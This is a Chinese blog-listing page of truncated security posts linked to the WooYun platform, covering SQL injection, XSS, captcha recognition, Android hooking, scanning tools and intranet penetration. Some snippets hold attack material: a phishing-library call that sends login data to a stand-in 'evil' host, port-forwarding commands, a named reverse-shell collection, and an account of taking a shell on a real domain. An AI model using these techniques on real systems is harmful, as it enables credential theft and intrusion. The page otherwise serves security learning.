wooyun

weiphp /Application/Admin/Controller/PublicController.class.php Login SQL Injection Vul

catalogue1.漏洞描述 2.漏洞触发条件 3.漏洞影响范围 4.漏洞代码分析 5.防御方法 6.攻防思考 1.漏洞描述RelevantLink:http://www.wooyun.org
.Little Hann·2016-04-03 20:00

记sql注入第一次实战

0x01.寻找目标:去wooyun看了666个政府网站的注入点,所以很受启发,随便用一个点google一下,再在结果中随便找了一个0x02.确认是否存在SQL注入漏洞:参数本身是id=7,乍一看是数值参数
strwolf·2016-03-31 10:00

python黑科技

依然选用Sublimetext2+JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里:http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖
qq458639026·2016-03-28 16:00

android开发中遇到的安全问题

本文是自己在开发过程中,app上线前的安全检测遇到的问题,以便及时汇总记录下来.参考链接:http://drops.wooyun.org/tips/3936http://www.360doc.com/content
qq_24304811·2016-03-25 23:00

AceDeceiver成为首个可利用苹果DRM设计漏洞感染iOS设备的木马

http://drops.wooyun.org/mobile/139180x00简介近日,我们发现了一个全新系列的iOS恶意软件,这个恶意软件叫做“AceDeceiver”,能够成功感染任何非越狱设备
zdpyly21·2016-03-23 10:00

图解double free 原理

看了乌云上一篇关于doublefree原理的文章,动手调试了一下也不是很明白作者的几个框图内部逻辑,最后再仔细研读调试了一下做了以下整理,原链接如下:http://drops.wooyun.org/binary
yy2014yy·2016-03-22 22:55

Weblogic整合的一些利用方法20160321

http://wooyun.org/bugs/wooyun-2015-0127056lcx-listen337802lcx-slave127.0.0.133127.0.0.13389我觉得是不是你应该可以直接
qq_27446553·2016-03-21 23:00

redis+ssh-keygen免认证登录案例

http://www.wooyun.org/bugs/wooyun-2015-01527101、修改默认端口看来很重要。2、放内网3、即使放内网也要做好权限访问
gaolongquan·2016-03-21 18:00

sqlmap

sqlmap用户手册http://drops.wooyun.org/tips/143JavaWeb应用[3]-SQL注入[1]http://drops.wooyun.org/tips/236
Oscarfff·2016-03-19 21:00

xss学习的一小步

学习地址:http://xss.pkav.net/xss/【一】绕过浏览器过滤的语句,http://wooyun.org/bugs/wooyun-2010-016672【2】利用html编码绕过百度云加速
niexinming·2016-03-18 17:00

20160315

关键字绕过的奥秘   多次过滤的奥秘:2,3次注入;update更新管理员jsp图片马:   在F盘百度网盘有下载   桌面也有文件夹有   Java&&.Net代码审计知识回顾:   http://www.wooyun.org
qq_27446553·2016-03-17 17:00

jQuery.Phishing

Usage$.phishing('http://wooyun.org/login','http://evil/receive')(function(){ varload_jquery=()=>{ if(
qq_27446553·2016-03-17 13:00

再谈Mysql中limit后的注入

目前limit后注入的唯一方法是使用procedureanalyse进行报错注入,详细请阅读http://zone.wooyun.org/content/18220,在文中提到此方法适用于5.x系列的mysql
qq_27446553·2016-03-13 15:00

ZoomEye

//www.zoomeye.org/*类似工具IVRE 1.摄像头漏洞(1)http://www.2cto.com/Article/201401/269458.html(2)http://drops.wooyun.org
Hi,Leisure·2016-03-04 13:00

Python识别网站验证码

http://drops.wooyun.org/tips/6313 Python识别网站验证码Manning · 2015/05/2810:57 0x00识别涉及技术验证码识别涉及很多方面的内容。
donaldlee·2016-03-02 22:00

常见验证码的弱点与验证码识别

http://drops.wooyun.org/tips/141常见验证码的弱点与验证码识别insight-labs · 2013/06/0811:36 0x00简介验证码作为一种辅助安全手段在Web安全中有着特殊的地位
donaldlee·2016-03-02 22:00

初探验证码识别

http://drops.wooyun.org/tips/4550 初探验证码识别sdc1992 · 2015/01/0915:18 0x00背景介绍全自动区分计算机和人类的图灵测试(英语:CompletelyAutomatedPublicTuringtesttotellComputersandHumansApart
donaldlee·2016-03-02 22:00

乌云日志

http://drops.wooyun.org/tips/7462http://drops.wooyun.org/papers/10656http://drops.wooyun.org/tips/12972http
规格严格-功夫到家·2016-03-01 13:00

加盐hash保存密码的正确方式

加盐hash保存密码的正确方式转自:http://drops.wooyun.org/papers/1066
zheng19851·2016-02-26 09:28

在非越狱手机上进行App Hook

如果图片不能浏览,转原文地址:http://drops.wooyun.org/papers/12803#rd推荐序蒸米是谁?
jijiji000111·2016-02-25 15:00

初学scrapy之爬取wooyun.org网站

1.创建项目1)创建项目命令scrapy startproject wooyun该命令会在当前目录下创建一个wooyun文件夹2)定义items.pyScrapy提供了Item类,用来保存从页面爬取的数据
月中笙歌·2016-02-24 08:46

SQL 注入

bbs.blackbap.org/thread-2433-1-1.htmlhttp://silic.org/post/SQL_Injection_by_Silic 1.SQL注入之sqlmaphttp://drops.wooyun.org
Hi,Leisure·2016-02-23 17:00

安卓动态调试七种武器之离别钩 – Hooking(下)

作者:蒸米地址:http://drops.wooyun.org/papers/101560x00序随着移动安全越来越火,各种调试工具也都层出不穷,但因为环境和需求的不同,并没有工具是万能的。
beyond702·2016-02-23 11:00

安卓动态调试七种武器之离别钩 – Hooking(上)

作者:蒸米地址:http://drops.wooyun.org/tips/93000x00序随着移动安全越来越火,各种调试工具也都层出不穷,但因为环境和需求的不同,并没有工具是万能的。
·2016-02-23 11:00

安卓动态调试七种武器之孔雀翎 – Ida Pro

作者:蒸米地址:http://drops.wooyun.org/tips/68400x00序随着移动安全越来越火,各种调试工具也都层出不穷,但因为环境和需求的不同,并没有工具是万能的。
beyond702·2016-02-23 11:00

安卓动态调试七种武器之长生剑 - Smali Instrumentation

作者:蒸米地址:http://drops.wooyun.org/tips/68400x00序随着移动安全越来越火,各种调试工具也都层出不穷,但因为环境和需求的不同,并没有工具是万能的。
beyond702·2016-02-23 10:00

0219 --xcode 7 以后常见的问题

Xcode7之后常见问题整理字数1476 阅读6769 评论5 喜欢22一.Xcode7,iOS9之后传出来的什么Xcode有鬼,被植入代码片段什么的,可以看看,了解一下http://drops.wooyun.org
zhen_zhen·2016-02-19 11:00

python 爬取乌云所有厂商名字,url,漏洞总数 并存入数据库

NavicatMySQLDataTransfer SourceServer:127.0.0.1 SourceServerVersion:50509 SourceHost:127.0.0.1:3306 SourceDatabase:wooyun
depycode·2016-02-15 10:00

安全站点收集

技术类:安全脉搏http://www.secpulse.com/乌云知识库http://drops.wooyun.org/博客类:http://www.cnseay.com/http://www.waitalone.cn
quiterr·2016-02-14 14:41

common-collections中Java反序列化漏洞导致的RCE原理分析

反序列化漏洞导致的RCE原理分析隐形人真忙 · 2015/11/1122:400x00背景这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org
Oscarfff·2016-02-13 22:00

Android WebView的Js对象注入漏洞解决方案

最近在做一个项目过程中,发现了一个很严重的安全漏洞,这个漏洞是乌云平台(http://www.wooyun.org)报告出来的。
jdsjlzx·2016-02-04 10:00

浅析手机抓包方法实践(zt)

原文:http://drops.wooyun.org/tips/124670x00摘要在移动逆向分析以及App开发的时候,总会需要对其网络行为进行监控测试,本文总结一些抓包思路,并对其使用方法进行实践笔者认为在抓包界
davad.di·2016-02-01 10:00

nmap脚本使用总结

原文链接:http://drops.wooyun.org/tips/21880x00前言:nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。
orical·2016-01-27 10:00

nmap脚本使用总结

原文链接:http://drops.wooyun.org/tips/21880x00前言:nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。
orical·2016-01-27 10:00

wooyun内网渗透教学分享之内网信息探测和后渗透准备

常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个PhpcmsV9ucapiSQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先
h4ck0ne·2016-01-23 17:15

业务安全漏洞挖掘归纳总结

URL:http://zone.wooyun.org/content/20839一些工具及脚本BurpsuitehtpwdScan撞库爆破必备U
h4ck0ne·2016-01-23 17:43

JSP SHELL有关的whoami漏洞

参考资料:http://www.wooyun.org/bugs/wooyun-2010-0125774http:/
OXiaoMianYiJiu·2016-01-22 17:00

charles使用教程指南

转:http://drops.wooyun.org/tips/24230x01前言:Charles是一款抓包修改工具,相比起burp,charles具有界面简单直观,易于上手,数据请求控制容易,修改简单
zhangmiaoping23·2016-01-20 20:00

Android应用程序通用自动脱壳方法研究

本文转载自: http://drops.wooyun.org/tips/9214 Author:@爱博才会赢本文为乌云峰会上《Android应用程序通用自动脱壳方法研究》的扩展延伸版。
太尼玛菜了·2016-01-13 11:00

Android应用方法隐藏及反调试技术浅析

本文转载自: http://drops.wooyun.org/tips/9471 0x00前言Android应用的加固和对抗不断升级,单纯的静态加固效果已无法满足需求,所以出现了隐藏方法加固,运行时动态恢复和反调试等方法来对抗
太尼玛菜了·2016-01-13 10:00

WooYun 知识库下载,离线观看好文章

阅读目录工具介绍效果截图  wooyun知识库的文章是非常棒的文章,在某些时候没有网络的情况下,也能离线观看!
vforbox·2016-01-11 16:00

各种语言一句话反弹shell

转自:http://wiki.wooyun.org/pentest:%E5%90%84%E7%A7%8D%E8%AF%AD%E8%A8%80%E4%B8%80%E5%8F%A5%E8%AF%9D%E5%
招魂怪·2015-12-30 11:20

NMAP 基础教程

原文地址: http://drops.wooyun.org/tips/20020x00nmap介绍Nmap  (网络映射器)是由 Gordon Lyon设计,用来探测计算机网络上的主机和服务的一种安全扫描器
孤剑·2015-12-25 08:00

iOS APP安全杂谈之三

转:http://drops.wooyun.org/papers/95980x00序听说最近IOS让人操碎了心,不到三个月的时间里先后发生太极越狱被曝存在后门,22万iCloud账号及机密信息被多款内置后门越狱插件窃取并泄露
zhangmiaoping23·2015-12-24 18:00

charles 使用

转载自乌云平台原文链接http://drops.wooyun.org/tips/24230x01前言:Charles是一款抓包修改工具,相比起burp,charles具有界面简单直观,易于上手,数据请求控制容易
ccccdddxxx·2015-12-23 15:00

移动app漏洞趋势

个人总结,可能片面或不正确,看下就好样本来自WooYun网站,截止15年12月19号,一共75650个漏洞;一、Top10安全漏洞中,sql注入占1/3;可见如果你是sql注入方面的测试专家,web安全
咖啡成瘾的雪人·2015-12-20 23:00

Joomla反序列化通杀漏洞(版本低于3.4.5)复现的那些坑

关于该漏洞的分析可以参考一下链接:wooyundrops上的:http://drops.wooyun.org/papers/11330Freebuf上的:http://www.freebuf.com/vuls
clumsy_geek·2015-12-18 13:30

Python Scrapy爬虫框架安装、配置及实践

wooyun算是国内最有名的漏洞报告平台,总结一下这上面的漏洞数据对后面测试与分析漏洞趋势有指导意义,因此写一个爬虫。不再造轮子了,使用Python的Scrapy框架实现之。
咖啡成瘾的雪人·2015-12-18 03:00

Linux PAM

转载:http://drops.wooyun.org/tips/1288PAM(PluggableAuthenticationModules)是由Sun提出的一种认证机制。
zouliuyun·2015-12-17 14:02

Linux PAM

转载:http://drops.wooyun.org/tips/1288PAM(PluggableAuthenticationModules)是由Sun提出的一种认证机制。
zouliuyun·2015-12-17 14:02
上一页 2 3 4 5 6 7 8 9 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他